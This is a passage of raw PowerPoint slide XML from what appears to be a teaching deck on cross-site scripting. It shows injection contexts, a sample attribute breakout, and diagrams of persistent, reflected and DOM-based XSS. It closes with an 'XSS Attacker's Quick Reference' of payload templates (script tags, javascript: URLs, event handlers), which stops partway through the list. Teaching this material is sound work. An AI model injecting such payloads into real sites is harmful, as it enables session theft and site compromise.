                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>"&gt;&lt;script&gt;...&lt;/script&gt;&lt;input value="</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E6E6E6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2408296">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Resulting code</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="101600" marR="101600" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="A6A6A6"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnT w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnT>
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="1" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;input value="</a:t>
                      </a:r>
                      <a:r>
                        <a:t>"&gt;&lt;script&gt;...&lt;/script&gt;&lt;input value="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>"&gt;</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F3F3F3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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1687" name="Table"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="809240" y="892964"/>
          <a:ext cx="11386320" cy="7224890"/>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3721860"/>
                <a:gridCol w="7664458"/>
              </a:tblGrid>
              <a:tr h="1204148">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Context</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="101600" marR="1016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A6A6A6"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Example code</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="101600" marR="1016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A6A6A6"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1204148">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>HTML element content</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F3F3F3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="1" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="FF7F00"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;div&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:t>userInput</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>&lt;/div&gt;</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F3F3F3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1204148">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>HTML attribute value</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E6E6E6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="1600">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>&lt;input value="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF7F00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>userInput</a:t>
                      </a:r>
                      <a:r>
                        <a:t>"&gt;</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E6E6E6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1204148">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>URL query value</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F3F3F3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="1600">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>http://example.com/?parameter=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF7F00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>userInput</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F3F3F3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1204148">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>CSS value</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E6E6E6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="1" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="FF7F00"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>color: </a:t>
                      </a:r>
                      <a:r>
                        <a:t>userInput</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E6E6E6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1204148">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>JavaScript value</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F3F3F3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" defTabSz="914400">
                        <a:defRPr sz="1600">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:t>var name = "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF7F00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>userInput</a:t>
                      </a:r>
                      <a:r>
                        <a:t>";</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F3F3F3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1688" name="For each of these, specific rules must be followed so that the user input cannot break out of its context and be interpreted as malicious code."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272443" y="8341852"/>
            <a:ext cx="12925746" cy="84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For each of these, specific rules must be followed so that the user input cannot break out of its context and be interpreted as malicious code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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0" name="Persistent XSS"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265929" y="364423"/>
            <a:ext cx="204596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Persistent XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1691" name="where the malicious string originates from the website's database."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572341" y="8848048"/>
            <a:ext cx="9247756"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where the malicious string originates from the website's database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1692" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1188871"/>
            <a:ext cx="13004801" cy="7375858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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94" name="http://excess-xss.com/reflected-xss.png" descr="http://excess-xss.com/reflected-xss.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144497" y="975359"/>
            <a:ext cx="12715806" cy="6297926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1695" name="Reflected XSS"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265929" y="364423"/>
            <a:ext cx="200533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Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1696" name="where the malicious string originates from the victim's request."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572341" y="8848048"/>
            <a:ext cx="8836395"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where the malicious string originates from the victim's request.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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8" name="DOM-based XSS"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265929" y="364423"/>
            <a:ext cx="220729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DOM-based XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1699" name="where the vulnerability is in the client-side code rather than the server-side code."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="682672" y="9229335"/>
            <a:ext cx="11453091"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where the vulnerability is in the client-side code rather than the server-side code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1700" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="899247"/>
            <a:ext cx="13004801" cy="8304618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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2" name="The XSS Attacker’s Quick Reference"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="841247">
              <a:defRPr sz="5704"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The XSS Attacker’s Quick Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1703" name="&lt;script&gt;[code]&lt;/script&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505938" y="2059093"/>
            <a:ext cx="10412872" cy="6676251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[code]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script src=</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[link to code]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;div style=width: expression(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[code]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>);&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;style&gt;@import "javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[code]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;";&lt;/style&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;img src=javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[code]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;img src="my.jpg" onmouseover=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[code]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;body onload=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[code]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
